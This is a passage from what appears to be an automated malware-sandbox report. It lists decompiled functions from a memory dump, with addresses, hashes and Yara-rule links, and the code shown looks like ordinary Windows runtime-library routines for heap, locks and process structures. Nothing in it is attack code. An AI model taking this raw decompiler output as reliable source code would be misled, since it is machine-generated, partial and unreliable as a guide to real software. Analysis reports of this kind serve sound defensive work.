								E04936B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E048D7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E048F9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E048FB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L048D4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                            0x04937016
                                                            0x0493701e
                                                            0x0493702b
                                                            0x04937033
                                                            0x04937037
                                                            0x0493703c
                                                            0x0493703e
                                                            0x04937041
                                                            0x04937045
                                                            0x0493704a
                                                            0x04937050
                                                            0x04937055
                                                            0x0493705a
                                                            0x04937062
                                                            0x04937062
                                                            0x0493705a
                                                            0x04937064
                                                            0x04937064
                                                            0x04937067
                                                            0x04937071
                                                            0x04937096
                                                            0x0493709b
                                                            0x049370a2
                                                            0x049370a6
                                                            0x049370a7
                                                            0x049370ad
                                                            0x049370b3
                                                            0x049370b6
                                                            0x049370bb
                                                            0x049370c3
                                                            0x049370c3
                                                            0x049370c6
                                                            0x049370cd
                                                            0x049370dd
                                                            0x049370e0
                                                            0x049370e2
                                                            0x049370e2
                                                            0x049370ee
                                                            0x04937101
                                                            0x049370f0
                                                            0x049370f9
                                                            0x049370f9
                                                            0x0493710a
                                                            0x0493710e
                                                            0x04937112
                                                            0x04937117
                                                            0x04937118
                                                            0x04937118
                                                            0x049370bb
                                                            0x0493711d
                                                            0x04937123
                                                            0x04937131
                                                            0x04937131
                                                            0x04937136
                                                            0x0493713d
                                                            0x0493713e
                                                            0x0493713f
                                                            0x0493714a
                                                            0x0493714a
                                                            0x04937084
                                                            0x04937088
                                                            0x00000000
                                                            0x0493708e
                                                            0x0493708e
                                                            0x04937092
                                                            0x00000000
                                                            0x04937092

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8ca145caeb1c42acb4fb1595626b0ed3ee6e6c0d5650c69344bd5c03795648b9
                                                            • Instruction ID: a5f0e21a29cc24dfcdd53ea1ee5a7c79ddace7f2eb079f607900794ade8c4eda
                                                            • Opcode Fuzzy Hash: 8ca145caeb1c42acb4fb1595626b0ed3ee6e6c0d5650c69344bd5c03795648b9
                                                            • Instruction Fuzzy Hash: 9E31A5B26047519BD321DFA8C840E6AB7A9FF89700F044A69F85597690E770F904CBA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048DC182, Relevance: .1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E048DC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E048D7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04988D34(_v8, _t80);
					}
					E048D2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E048CFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04988833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E048CFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E048FB180();
						if(_a4 != 0) {
							E048D2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E048DBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E048DBB2D(_t16, _t15);
						E048DB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E048CFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E048CFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E048CFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                            0x048dc18d
                                                            0x048dc18f
                                                            0x048dc191
                                                            0x048dc19b
                                                            0x048dc1a0
                                                            0x048dc1d4
                                                            0x048dc1de
                                                            0x04922d6e
                                                            0x048dc1e4
                                                            0x048dc1e4
                                                            0x048dc1e4
                                                            0x048dc1ec
                                                            0x04922d7d
                                                            0x04922d7d
                                                            0x048dc1f3
                                                            0x048dc1ff
                                                            0x04922d88
                                                            0x04922d8d
                                                            0x04922d94
                                                            0x04922d94
                                                            0x04922d9f
                                                            0x04922da4
                                                            0x04922dab
                                                            0x04922db0
                                                            0x04922db2
                                                            0x04922db3
                                                            0x04922db4
                                                            0x04922dbc
                                                            0x04922dc3
                                                            0x04922dc3
                                                            0x048dc205
                                                            0x048dc205
                                                            0x048dc208
                                                            0x048dc20e
                                                            0x048dc211
                                                            0x048dc216
                                                            0x048dc219
                                                            0x048dc21f
                                                            0x048dc222
                                                            0x048dc22c
                                                            0x048dc234
                                                            0x048dc23a
                                                            0x048dc23f
                                                            0x048dc245
                                                            0x048dc24b
                                                            0x048dc251
                                                            0x048dc25a
                                                            0x048dc276
                                                            0x048dc27d
                                                            0x048dc27d
                                                            0x048dc25c
                                                            0x048dc25c
                                                            0x00000000
                                                            0x048dc25e
                                                            0x048dc1a4
                                                            0x048dc1aa
                                                            0x048dc1b3
                                                            0x048dc265
                                                            0x048dc26c
                                                            0x048dc26c
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                            • Instruction ID: 9f3ce1f46fb6efef2e1c600795dae1eb0d3e1efc709ff918bfcd980198c9b58d
                                                            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                            • Instruction Fuzzy Hash: E531287170254ABEEB04EFB8C480BE9F759BF46208F044B6ED518C7241DB74BA45D7A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048EA70E, Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 92%
                                                            			E048EA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x49a7b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x49a7b10 = 8;
					 *0x49a7b14 = 0x49a7b0c;
					 *0x49a7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E048EA990(0x49a7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L048EA840(__edx, __ecx, __ecx, _t52, 0x49a7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x49a7b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x49a7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x49a7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L048D4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x49a7b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E048FF3E0(_t50,  *0x49a7b14, _t8 >> 3);
						_t28 =  *0x49a7b14; // 0x771c7b0c
						__eflags = _t28 - 0x49a7b0c;
						if(_t28 != 0x49a7b0c) {
							L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x49a7b14 = _t50;
						_t48 = _v12;
						 *0x49a7b10 = _t9;
						goto L6;
					}
					 *0x49a7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                            0x048ea713
                                                            0x048ea714
                                                            0x048ea717
                                                            0x048ea71d
                                                            0x048ea720
                                                            0x048ea722
                                                            0x048ea727
                                                            0x048ea74a
                                                            0x048ea754
                                                            0x048ea75e
                                                            0x048ea768
                                                            0x048ea76a
                                                            0x048ea773
                                                            0x048ea78b
                                                            0x048ea790
                                                            0x048ea792
                                                            0x048ea741
                                                            0x048ea741
                                                            0x048ea743
                                                            0x048ea749
                                                            0x048ea749
                                                            0x048ea732
                                                            0x048ea73a
                                                            0x048ea797
                                                            0x048ea79d
                                                            0x048ea7a3
                                                            0x048ea7a9
                                                            0x048ea7b6
                                                            0x048ea7bc
                                                            0x048ea7ca
                                                            0x048ea7e0
                                                            0x048ea7e2
                                                            0x048ea7e4
                                                            0x04929bf2
                                                            0x00000000
                                                            0x04929bf2
                                                            0x048ea7ed
                                                            0x048ea7f2
                                                            0x048ea800
                                                            0x048ea805
                                                            0x048ea80d
                                                            0x048ea812
                                                            0x04929c08
                                                            0x04929c08
                                                            0x048ea818
                                                            0x048ea81b
                                                            0x048ea821
                                                            0x048ea824
                                                            0x00000000
                                                            0x048ea824
                                                            0x048ea7ae
                                                            0x00000000
                                                            0x048ea7ae
                                                            0x048ea73c
                                                            0x048ea73e
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03cd0a4aef6be80f6b36e6a6f3e3444ebb2f999eb10e3908de7d0d4bfda39653
                                                            • Instruction ID: b8312c0e75cf7d1070b4edf5bb38a95154908eec639ac1ac9253cf8b3f56963f
                                                            • Opcode Fuzzy Hash: 03cd0a4aef6be80f6b36e6a6f3e3444ebb2f999eb10e3908de7d0d4bfda39653
                                                            • Instruction Fuzzy Hash: D831BCF1A042049FD715CB88DC82F65BBF9EB85B04F000AAAE045C7240D3B4ED29CBD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048E61A0, Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 97%
                                                            			E048E61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E048E5E50(0x48967cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E04989D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E048BF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                            0x048e61b3
                                                            0x048e61b5
                                                            0x048e61bd
                                                            0x048e61c3
                                                            0x048e61c7
                                                            0x048e61d2
                                                            0x048e61ff
                                                            0x048e61ff
                                                            0x048e6201
                                                            0x048e6207
                                                            0x048e6207
                                                            0x048e61d4
                                                            0x048e61d9
                                                            0x00000000
                                                            0x00000000
                                                            0x048e61df
                                                            0x048e61e2
                                                            0x00000000
                                                            0x00000000
                                                            0x048e61e6
                                                            0x048e61e8
                                                            0x048e61ee
                                                            0x048e61ee
                                                            0x048e61f9
                                                            0x0492762f
                                                            0x04927632
                                                            0x04927635
                                                            0x04927639
                                                            0x04927640
                                                            0x0492766e
                                                            0x04927675
                                                            0x00000000
                                                            0x00000000
                                                            0x04927681
                                                            0x04927689
                                                            0x0492768d
                                                            0x04927691
                                                            0x04927695
                                                            0x04927699
                                                            0x049276af
                                                            0x049276b5
                                                            0x049276b7
                                                            0x049276b7
                                                            0x049276d7
                                                            0x049276dc
                                                            0x00000000
                                                            0x049276dc
                                                            0x049276a2
                                                            0x049276a9
                                                            0x04927651
                                                            0x04927653
                                                            0x04927653
                                                            0x04927656
                                                            0x04927656
                                                            0x00000000
                                                            0x04927656
                                                            0x04927644
                                                            0x04927646
                                                            0x04927648
                                                            0x04927648
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f76478f670381ac1285c4f709de91e4bfdb2c68dcf16e508dec0dbf1ed1467ea
                                                            • Instruction ID: e26e33db6f5b2d4a942306b82d9e71a293753952842b88feeb712b7e725c326c
                                                            • Opcode Fuzzy Hash: f76478f670381ac1285c4f709de91e4bfdb2c68dcf16e508dec0dbf1ed1467ea
                                                            • Instruction Fuzzy Hash: C3318B716097118FD360DF4AC900B26B7E5FF98B04F444AADE998E7351E7B1E904CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F8EC7, Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 93%
                                                            			E048F8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x49ad360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E048E4E70(0x49a86e4, 0x48f9490, 0, 0);
					if( *0x49a53e8 > 5 && E048F8F33(0x49a53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x49a53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x49a53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x489bc46;
						_t48 = E04937B9C(0x49a53e8, 0x489bc46, _t67, 0x49a53e8, _t70,  &_v140);
					}
				}
				return E048FB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                            0x048f8ec7
                                                            0x048f8ed9
                                                            0x048f8edc
                                                            0x048f8ee6
                                                            0x048f8ee9
                                                            0x048f8eee
                                                            0x048f8efc
                                                            0x048f8f08
                                                            0x04931349
                                                            0x04931353
                                                            0x0493135d
                                                            0x04931366
                                                            0x0493136f
                                                            0x04931375
                                                            0x0493137c
                                                            0x04931385
                                                            0x04931390
                                                            0x04931391
                                                            0x0493139c
                                                            0x0493139d
                                                            0x049313a6
                                                            0x049313ac
                                                            0x049313b2
                                                            0x049313b5
                                                            0x049313bc
                                                            0x049313bf
                                                            0x049313c2
                                                            0x049313c5
                                                            0x049313c8
                                                            0x049313cb
                                                            0x049313ce
                                                            0x049313d1
                                                            0x049313d4
                                                            0x049313d7
                                                            0x049313da
                                                            0x049313dd
                                                            0x049313e0
                                                            0x049313e3
                                                            0x049313e6
                                                            0x049313e9
                                                            0x049313f6
                                                            0x04931400
                                                            0x04931400
                                                            0x048f8f08
                                                            0x048f8f32

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7ae4880e845f33c0feba0e9fe7e1baa83bc74d69121801b8bf8e7efa7f62c5f9
                                                            • Instruction ID: 3f369a37cf48f8f403c5b3375bd417fec9653821cb1eeafb1a5628c7180cd08b
                                                            • Opcode Fuzzy Hash: 7ae4880e845f33c0feba0e9fe7e1baa83bc74d69121801b8bf8e7efa7f62c5f9
                                                            • Instruction Fuzzy Hash: 734191B1D00218AFDB10DFAAD981AADFBF4FB48714F5085AEE509E7600DB746A44CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048EE730, Relevance: .1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 74%
                                                            			E048EE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E048F9670() < 0) {
					L0490DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x49a7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L048D4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M048EE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                            0x048ee730
                                                            0x048ee736
                                                            0x048ee738
                                                            0x048ee73d
                                                            0x048ee73e
                                                            0x048ee740
                                                            0x048ee749
                                                            0x048ee765
                                                            0x048ee76a
                                                            0x048ee76b
                                                            0x048ee76c
                                                            0x048ee76d
                                                            0x048ee76e
                                                            0x048ee76f
                                                            0x048ee775
                                                            0x048ee777
                                                            0x048ee77e
                                                            0x0492b675
                                                            0x048ee784
                                                            0x048ee784
                                                            0x048ee789
                                                            0x048ee7a8
                                                            0x048ee7ac
                                                            0x048ee807
                                                            0x048ee7ae
                                                            0x048ee7ae
                                                            0x048ee7b1
                                                            0x048ee7b4
                                                            0x048ee7b9
                                                            0x048ee7c0
                                                            0x048ee7c4
                                                            0x048ee7ca
                                                            0x048ee7cc
                                                            0x00000000
                                                            0x048ee7d3
                                                            0x048ee7d6
                                                            0x00000000
                                                            0x00000000
                                                            0x048ee7ff
                                                            0x048ee802
                                                            0x00000000
                                                            0x00000000
                                                            0x048ee7f9
                                                            0x048ee7fc
                                                            0x00000000
                                                            0x00000000
                                                            0x048ee7f3
                                                            0x048ee7f6
                                                            0x00000000
                                                            0x00000000
                                                            0x048ee7ed
                                                            0x048ee7f0
                                                            0x00000000
                                                            0x00000000
                                                            0x048ee7e7
                                                            0x048ee7ea
                                                            0x00000000
                                                            0x00000000
                                                            0x0492b685
                                                            0x0492b688
                                                            0x00000000
                                                            0x00000000
                                                            0x0492b682
                                                            0x00000000
                                                            0x00000000
                                                            0x048ee7cc
                                                            0x048ee7d9
                                                            0x048ee7dc
                                                            0x048ee7de
                                                            0x048ee7de
                                                            0x048ee7ac
                                                            0x048ee7e4
                                                            0x048ee74b
                                                            0x048ee751
                                                            0x048ee759
                                                            0x048ee761
                                                            0x048ee761

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4e825f81418b304645a531bbeef8de7b2ae1620a592e9e42073bab084a27e5f7
                                                            • Instruction ID: 676c610eb9f25f38493d81fa2f89bd448c8801fb10c0455f5fa96d236e6392c0
                                                            • Opcode Fuzzy Hash: 4e825f81418b304645a531bbeef8de7b2ae1620a592e9e42073bab084a27e5f7
                                                            • Instruction Fuzzy Hash: 41318F75A14249EFE704CF59D841BA6B7E4FB09314F148666F904CB341E731ED80CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048EBC2C, Relevance: .1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 67%
                                                            			E048EBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x49a6100; // 0x16
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E048D2280(0xd, 0x1703f1a0);
				_t41 =  *0x49a60f8; // 0x0
				if(_t41 != 0) {
					 *0x49a60f8 =  *_t41;
					 *0x49a60fc =  *0x49a60fc + 0xffff;
				}
				E048CFFB0(_t41, 0x800, 0x1703f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x49a60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L048D4620(0x49a6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x49a6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                            0x048ebc36
                                                            0x048ebc42
                                                            0x048ebc45
                                                            0x048ebc4a
                                                            0x048ebd35
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048ebc50
                                                            0x048ebc50
                                                            0x048ebc58
                                                            0x048ebc5a
                                                            0x048ebc60
                                                            0x00000000
                                                            0x00000000
                                                            0x0492a4f2
                                                            0x0492a4f6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0492a4fc
                                                            0x048ebc79
                                                            0x048ebc7e
                                                            0x048ebc86
                                                            0x048ebd16
                                                            0x048ebd20
                                                            0x048ebd20
